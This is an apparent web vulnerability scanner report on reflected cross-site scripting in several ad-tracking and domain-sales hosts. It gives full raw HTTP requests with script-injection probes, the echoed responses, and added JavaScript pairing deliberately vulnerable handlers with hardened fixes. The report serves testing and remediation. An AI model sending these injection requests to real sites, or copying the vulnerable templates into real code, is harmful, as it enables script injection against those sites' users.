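function passesNulTerminatedBlocklist(value) {
  const seen = value.split("\u0000")[0];
  return !/[<>"']/.test(seen); // true = "looks clean" to the filter
}

// Stage 2: the echo. A typical attribute template with no output encoding.
// Many runtimes drop the NUL when emitting text, which matches the scanner's
// observation that "%00ab6a7..." was echoed as "ab6a7...".
function renderAttribute(value) {
  return `<a href="${value.replace(/\u0000/g, "")}">link</a>`;
}

function vulnerableHandler(rawPathSegment) {
  const value = decodeURIComponent(rawPathSegment); // %00 -> "\u0000"
  if (!passesNulTerminatedBlocklist(value)) return { blocked: true, html: "" };
  return { blocked: false, html: renderAttribute(value) };
}

// Hardened version: the filter and the output stage must see the same bytes,
// so control characters are rejected outright, and the value is encoded for
// the attribute context instead of being checked against a blocklist.
function encodeForHtmlAttribute(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

function hardenedHandler(rawPathSegment) {
  const value = decodeURIComponent(rawPathSegment);
  if (/[\u0000-\u001f\u007f]/.test(value)) return { blocked: true, html: "" };
  return { blocked: false, html: `<a href="${encodeForHtmlAttribute(value)}">link</a>` };
}
```

Run with the scanner's probe (`"><script>alert(1)</script>`) once plain and once prefixed with `%00`: the plain probe is blocked, the prefixed one passes the filter and reaches the page intact, and the hardened handler rejects the NUL variant and renders the plain one as inert text.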
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b1d"><script>alert(1)</script>f717e003dda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM46b1d"><script>alert(1)</script>f717e003dda/2010DM/1379918009@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:48 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5de6"><script>alert(1)</script>3370aaa4e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMe5de6"><script>alert(1)</script>3370aaa4e8c/1379918009@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:48 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97f9f"><script>alert(1)</script>40b55b3338d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1379918009@x2397f9f"><script>alert(1)</script>40b55b3338d HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:49 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
1.118. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1379918009@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aa96"-alert(1)-"766edfae151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1379918009@x23?3aa96"-alert(1)-"766edfae151=1 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:47 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2406 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="3aa96"-alert(1)-"766edfae151=1";
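The response above shows the injection context exactly: `var camp="3aa96"-alert(1)-"766edfae151=1";`. The following added example (not part of the scan report, and not the ad server's code) reconstructs that template shape to show why the `"-alert(1)-"` probe executes and how to emit the same value safely. The `vulnerableScript`/`hardenedScript` functions and the `alert` stand-in are assumptions made for the illustration.

```javascript
// Added example (not from the scan report): JavaScript string-context
// breakout as seen in finding 1.118, with a safe encoder beside it.

function vulnerableScript(paramName) {
  // String concatenation into a JavaScript string literal: a " in the input
  // ends the literal, and what follows is parsed as code.
  return 'var camp="' + paramName + '"; return camp;';
}

// Safe: JSON.stringify escapes ", \ and control characters, which is enough
// inside a standalone script. The extra replacements cover script that is
// inlined in HTML (</script> must not appear literally) and the two line
// terminators that JSON permits but older JavaScript engines reject in source.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/<\//g, "<\\/")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function hardenedScript(paramName) {
  return "var camp=" + jsStringLiteral(paramName) + "; return camp;";
}

// Runs a generated script with a stand-in for alert() and reports whether the
// injected call fired. The probe '"-alert(1)-"' works because the two string
// fragments become operands of the subtraction operator, and the operator
// forces alert(1) to be evaluated; camp ends up as NaN.
function runWithAlertSpy(script) {
  const calls = [];
  let result;
  try {
    result = new Function("alert", script)((x) => { calls.push(x); });
  } catch (e) {
    return { alertCalls: calls, camp: undefined, error: e.message };
  }
  return { alertCalls: calls, camp: result, error: null };
}
```

Note that the subtraction trick needs no `<` or `>` and no `;`, which is why scanners prefer it for string contexts: a filter that only strips tags does nothing against it. The fix is context-specific encoding; HTML entity encoding would not help here because the value never passes through the HTML parser.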
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a8e"><script>alert(1)</script>030155edc73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM98a8e"><script>alert(1)</script>030155edc73/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:18 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cb7"><script>alert(1)</script>053f18afa9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM94cb7"><script>alert(1)</script>053f18afa9e/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158b"><script>alert(1)</script>159ab450cc2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/141706813@x23c158b"><script>alert(1)</script>159ab450cc2?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:37:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/Dell_Streak11Q1_Max_Demo_160 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ded7"-alert(1)-"8d231d38687 was submitted in the USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2442 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687";
1.123. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/141706813@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f536"-alert(1)-"0101be03ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:16 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2445 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1";
1.124. http://domainnamesales.com/lcontact/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://domainnamesales.com
Path:
/lcontact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83be0"><script>alert(1)</script>c558e1b4c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83be0\"><script>alert(1)</script>c558e1b4c87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The backslash that was added in front of the double quote (the response is produced by PHP/5.3.2, and the \" is what addslashes()-style or magic-quotes escaping produces) gives no protection in this context: HTML has no backslash escape inside attribute values, so the browser still treats the " as the end of the action attribute and parses the <script> element that follows. Output in an HTML attribute must be entity-encoded (&quot;, &lt;, &gt;, &amp;), not backslash-escaped.
Request
GET /lcontact/?83be0"><script>alert(1)</script>c558e1b4c87=1 HTTP/1.1 Host: domainnamesales.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:53 GMT Server: Apache/2.2.16 (Amazon) X-Powered-By: PHP/5.3.2 X-Pingback: http://domainnamesales.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <form method="post" action="/lcontact/?83be0\"><script>alert(1)</script>c558e1b4c87=1″> ...[SNIP]...
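The following added example (not from the scan report or from the site) shows why the backslash in `83be0\"><script>...` changes nothing. The attribute reader implements the one HTML rule that matters here, that a double-quoted attribute value ends at the next `"` and a backslash is an ordinary character; it is an illustration, not a full HTML parser. The `addslashes` function is a stand-in for whatever produced the `\"` in the real response, and the `/lcontact/` form template is reconstructed from the snippet above.

```javascript
// Added example (not from the scan report): backslash escaping versus entity
// encoding in an HTML attribute context.

// Reads a double-quoted attribute value starting at index i (just after the
// opening quote), the way an HTML tokenizer does: stop at the next ".
function readDoubleQuotedAttr(html, i) {
  const end = html.indexOf('"', i);
  return { value: html.slice(i, end), rest: html.slice(end + 1) };
}

// PHP-style addslashes(): prefixes \, ' and " with a backslash. This is an
// escaping rule for PHP/SQL string literals, not for HTML.
function addslashes(s) {
  return s.replace(/([\\'"])/g, "\\$1");
}

// Correct encoder for text placed inside a quoted HTML attribute.
function encodeForHtmlAttribute(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// The template shape from the domainnamesales.com response: the query string
// of the current URL is copied into the form's action attribute.
function formTag(escaper, queryString) {
  return '<form method="post" action="/lcontact/?' + escaper(queryString) + '">';
}

// What the browser sees: the action value, and whatever follows it.
function parseAction(tag) {
  const start = tag.indexOf('action="') + 'action="'.length;
  return readDoubleQuotedAttr(tag, start);
}
```

With `addslashes` the attribute value ends at `83be0\` and the `<script>` element lands in the document; with entity encoding the whole payload stays inside the attribute and the only thing after it is the tag close.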
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e4a2<script>alert(1)</script>83865929184 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note the context: this is a JSONP endpoint, the callback parameter names the function the client expects the response to call, and the response is served with Content-Type: text/javascript. Loaded through a script include, the echoed tags are inert; the finding is exploitable as cross-site scripting where the response is rendered as HTML, for example when a victim is sent to the URL directly and the browser's content sniffing overrides the declared type. The same context applies to the metrolyrics.com variant of this finding below.
Request
GET /red/psi/sites/www.kenexa.com/p.json?callback=_ate.ad.hpr4e4a2<script>alert(1)</script>83865929184&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.kenexa.com%2Frequest&ox15i8 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh33.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=4; uid=4d5af32c71c2e1a5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 13:56:52 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 13:56:52 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 07 Mar 2011 13:56:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 07 Mar 2011 13:56:52 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f33cb<script>alert(1)</script>4c7ee0a1303 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.metrolyrics.com/p.json?callback=_ate.ad.hprf33cb<script>alert(1)</script>4c7ee0a1303&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.metrolyrics.com%2F&1pj0dsq HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh33.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=6; uid=4d5af32c71c2e1a5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 00:56:16 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 00:56:16 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 07 Mar 2011 00:56:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 07 Mar 2011 00:56:16 GMT Connection: close
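The usual fix for the two ds.addthis.com findings is to treat the callback name as an identifier rather than as free text, and to make sure the response can never be sniffed as HTML. The following added example (not part of the scan report, and not AddThis code) shows that: the `p.json` handler and the payload object are hypothetical, and only the legitimate callback value `_ate.ad.hpr` is taken from the requests above.

```javascript
// Added example (not from the scan report): JSONP callback allowlisting and
// response headers that keep the response from being treated as HTML.

// A callback must be a dotted chain of JavaScript identifiers. Anything with
// <, >, quotes, parentheses or whitespace is rejected rather than sanitised.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === "string" && name.length <= 64 && CALLBACK_RE.test(name);
}

// Builds the JSONP response for a validated callback. The body is
// callback(JSON); the headers declare a script MIME type and forbid sniffing,
// so a browser navigated to the URL directly will not render it as HTML.
function jsonpResponse(callback, payload) {
  if (!isValidCallback(callback)) {
    return { status: 400, headers: { "Content-Type": "text/plain" }, body: "invalid callback" };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
      "Cache-Control": "no-store",
    },
    body: `${callback}(${JSON.stringify(payload)});`,
  };
}
```

Rejecting rather than stripping is deliberate: a sanitiser that removes `<` and `>` would still let `alert(1)` or `x=1;y` through as a "callback", and the allowlist regex makes the accepted grammar explicit. `X-Content-Type-Options: nosniff` is worth setting on every script-returning endpoint regardless, since it removes the direct-navigation rendering path entirely.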
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 90814<script>alert(1)</script>ea8192a8c04 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note also the context visible in the response below: it is served as application/x-javascript and the cookie value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, where the <script> tags of the probe are inert. Execution as script therefore requires a single quote in the cookie value to be echoed unmodified as well, which this probe did not test; the same context applies to the remaining ar.voicefive.com cookie findings below.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=190814<script>alert(1)</script>ea8192a8c04; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C
Response
